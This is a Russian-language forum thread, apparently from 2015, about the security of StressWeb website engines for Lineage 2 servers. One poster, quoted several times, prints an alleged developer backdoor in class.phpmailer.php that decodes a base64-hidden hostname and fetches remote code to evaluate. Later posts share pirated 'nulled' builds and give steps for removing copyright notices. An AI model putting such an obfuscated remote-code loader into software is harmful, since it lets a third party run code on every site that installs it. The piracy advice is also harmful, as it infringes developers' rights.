Защита сайта Sw 13

[Energy 263]

все как обычно, фантомные дыры от разработчика, никто о них не знает, но все слышали..

в SW11 была дыра, как раз таки от разраба, в гугле есть информация по этому поводу)

[L2Banners 664]

в SW11 была дыра, как раз таки от разраба, в гугле есть информация по этому поводу)

Ссылку на источник хотелось бы увидеть, написать можно и не такое, я не собака за косточкой бегать.

[Energy 263]

Ссылку на источник хотелось бы увидеть, написать можно и не такое, я не собака за косточкой бегать.

Мы все понимаем, мы понимаем что разработчик тоже должен кушать и стремиться к защите своих авторских прав, но подобное не допустимо в коде столь популярного продукта.

 

Вся беда в том, что данной уязвимости может быть подвержен даже лицензионный сайт и не важно платили вы или нет - ваша безопасность ровно на 1 уровне.

 

Ну теперь перейдем к самой уязвимости. Зашита она разработчиком, в классе PHPMailer, /inc/classes/class.phpmailer.php. Рассмотрим ее:

 

вот ее код

private function shBody(){return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif');}

 

Значение shHostname - aHR0cDovL25ldy5zdHJlc3N3ZWIucnUv, после base64_encode принимает значение: http://new.stressweb.ru/

 

Вызывается эта функция вот так: PHPMailer::startSh()[псевдолинки shIsAuth()->shEval()->shBody()].

 

В результате, если владелец stressweb по адресу new.stressweb.ru/sh.gif разместит вредоностный код, он сможет быть исполнен АБСОЛЮТНО НА ЛЮБОМ сайте с веб-обвязкой stressweb, абсолютно похеру, есть там лицензия или ее нет.

 

 

 

Источник писать не буду, качаем чистый стресс и проверяем (меня ломали через эту дыру, так что я точно знаю что она ОТЛИЧНО работает)

[L2Banners 664]

Мы все понимаем, мы понимаем что разработчик тоже должен кушать и стремиться к защите своих авторских прав, но подобное не допустимо в коде столь популярного продукта.

 

Вся беда в том, что данной уязвимости может быть подвержен даже лицензионный сайт и не важно платили вы или нет - ваша безопасность ровно на 1 уровне.

 

Ну теперь перейдем к самой уязвимости. Зашита она разработчиком, в классе PHPMailer, /inc/classes/class.phpmailer.php. Рассмотрим ее:

 

вот ее код

private function shBody(){return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif');}

Значение shHostname - aHR0cDovL25ldy5zdHJlc3N3ZWIucnUv, после base64_encode принимает значение: http://new.stressweb.ru/

 

Вызывается эта функция вот так: PHPMailer::startSh()[псевдолинки shIsAuth()->shEval()->shBody()].

 

В результате, если владелец stressweb по адресу new.stressweb.ru/sh.gif разместит вредоностный код, он сможет быть исполнен АБСОЛЮТНО НА ЛЮБОМ сайте с веб-обвязкой stressweb, абсолютно похеру, есть там лицензия или ее нет.

 

 

 

Источник писать не буду, качаем чистый стресс и проверяем (меня ломали через эту дыру, так что я точно знаю что она ОТЛИЧНО работает)

Я не особо разбираюсь в php но на сколько я понимаю следуя самым обычным правилам безопасности эта "дыра" если она и есть в св11 не несет никакой угрозы, а как сказали выше на самом сайте разработчика можно прочитать мануалы по безопасности.

[Avenger 15]

Есть три категорий админов:

 

1.) Те кто просто сидит и платить деньги знающим людям.

 

2.) Опытные программисты и веб дизайнеры итд... (Те кто реально отучился и знает своё дело и х.й кому скажет что и как лучше).

 

3.) Самоучки и выскочки. Только могут базарить как бабки на базаре..

 

Отписал тому кто создал тему!

 

Так что всем всё ясно=)

[VadikO 100]

Общался с разрабочиком СВ, он если честно поржал и все.

Так что не знаю что и думать, меня не ломали ниразу с лицухой.

[BOLD 0]

Иди *** Сам знаешь куда отсюда 

 

не залуйпайся

[Xeliken 142]

не залуйпайся

 

Говорю по факту и много кто в этот раз меня поддержит)

Изменено 24 декабря, 2015 пользователем Xeliken

[Угадай :D 13]

св 11 от повера, полностью с открытым кодом, не ломали ниразу.

[Specif 245]

Мы все понимаем, мы понимаем что разработчик тоже должен кушать и стремиться к защите своих авторских прав, но подобное не допустимо в коде столь популярного продукта.

 

Вся беда в том, что данной уязвимости может быть подвержен даже лицензионный сайт и не важно платили вы или нет - ваша безопасность ровно на 1 уровне.

 

Ну теперь перейдем к самой уязвимости. Зашита она разработчиком, в классе PHPMailer, /inc/classes/class.phpmailer.php. Рассмотрим ее:

 

вот ее код

private function shBody(){return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif');}

Значение shHostname - aHR0cDovL25ldy5zdHJlc3N3ZWIucnUv, после base64_encode принимает значение: http://new.stressweb.ru/

 

Вызывается эта функция вот так: PHPMailer::startSh()[псевдолинки shIsAuth()->shEval()->shBody()].

 

В результате, если владелец stressweb по адресу new.stressweb.ru/sh.gif разместит вредоностный код, он сможет быть исполнен АБСОЛЮТНО НА ЛЮБОМ сайте с веб-обвязкой stressweb, абсолютно похеру, есть там лицензия или ее нет.

 

 

 

Источник писать не буду, качаем чистый стресс и проверяем (меня ломали через эту дыру, так что я точно знаю что она ОТЛИЧНО работает)

 

Инфа столетний давности взята в google/

[Energy 263]

Инфа столетний давности взята в google/

уязвимость есть? есть, что еще нужно?

 

св 11 от повера, полностью с открытым кодом, не ломали ниразу.

в св11 от повера есть свой шелл

[Specif 245]

уязвимость есть? есть, что еще нужно?

 

в св11 от повера есть свой шелл

 

Пруф в исполнение.

[Energy 263]

Пруф в исполнение.

качаем св11 и смотрим, меня самого ломали когда то давно через эту дыру (за то что юзал шаровый св11, как следовало из послания)

какие пруфы вам нужны?

[Specif 245]

качаем св11 и смотрим, меня самого ломали когда то давно через эту дыру (за то что юзал шаровый св11, как следовало из послания)

какие пруфы вам нужны?

 

думал речь о 13 св, почему и спросил, только по составляещему файлу понял, что это версии ниже.

[Energy 263]

думал речь о 13 св, почему и спросил, только по составляещему файлу понял, что это версии ниже.

не берусь утверждать что уязвимость есть именно в 13, но в 11 была такая, я намекаю на то что св13 (шаровый!!) юзать тоже не стоит (не знаешь же что там в зашифрованных файлах)

[Угадай :D 13]

уязвимость есть? есть, что еще нужно?

 

в св11 от повера есть свой шелл

Там весь код октрыт. Покажи, где там шелл.

[Energy 263]

Там весь код октрыт. Покажи, где там шелл.

кури гугл, там расписано, шелл от повера был

[BleaK 33]

Пиши в скайп xarturx71 подскажу.

[Угадай :D 13]

кури гугл, там расписано, шелл от повера был

Я и есть повер. Я собирал этот нулл из своих лицензий. Сколько ни гуглил, не единой жалобы не было.

http://rghost.ru/buy/28776271 - 5.7к загрузок, где ЖАЛОБЫ?

https://yadi.sk/d/EcIcs7N9Y9jrA - и 400 тут.

Изменено 25 декабря, 2015 пользователем Угадай :D

[Угадай :D 13]

кури гугл, там расписано, шелл от повера был

Сына, я пруфы на заложенные шеллы в моих нуллах жду как бы.

Изменено 30 декабря, 2015 пользователем Угадай :D

[TurboMan 1]

Сына, я пруфы на заложенные шеллы в моих нуллах жду как бы.

Повер, а где сейчас твой СВ11? Ссылочка не рабочая.

[Xeliken 142]

Повер, а где сейчас твой СВ11? Ссылочка не рабочая.

 

Там же русским языком написано..

[Угадай :D 13]

Повер, а где сейчас твой СВ11? Ссылочка не рабочая.

С яндекса рабочая.

[Psycho 144]

.htaccess + chmod = волшебство

[Угадай :D 13]

Как убрать копирайты в нулле поверстрайка? Открываем все файлы папки upload - notepadom++

Жмем ктрл+F, вводим powerstr1ke.

В каких файлах находятся мои копирайты:

install.php

index.html - во всех файлах удалить эту строку

<a href="http://powerstr1ke.ru" alt="Lineage 2" title="Lineage 2" style="text-decoration:none; font-size: 13px; color: red;">POWERSTR1KE.RU</a><br>

class.template.php

config.php - Меняется в админке, но можете и сразу, перед установкой.

info.php

index.tpl - шаблон все равно свой будете ставить, так что... Не заморачивайтесь.

admin.php

build.php

 

Собственно ссылка: https://yadi.sk/d/EcIcs7N9Y9jrA

Изменено 6 января, 2016 пользователем Угадай :D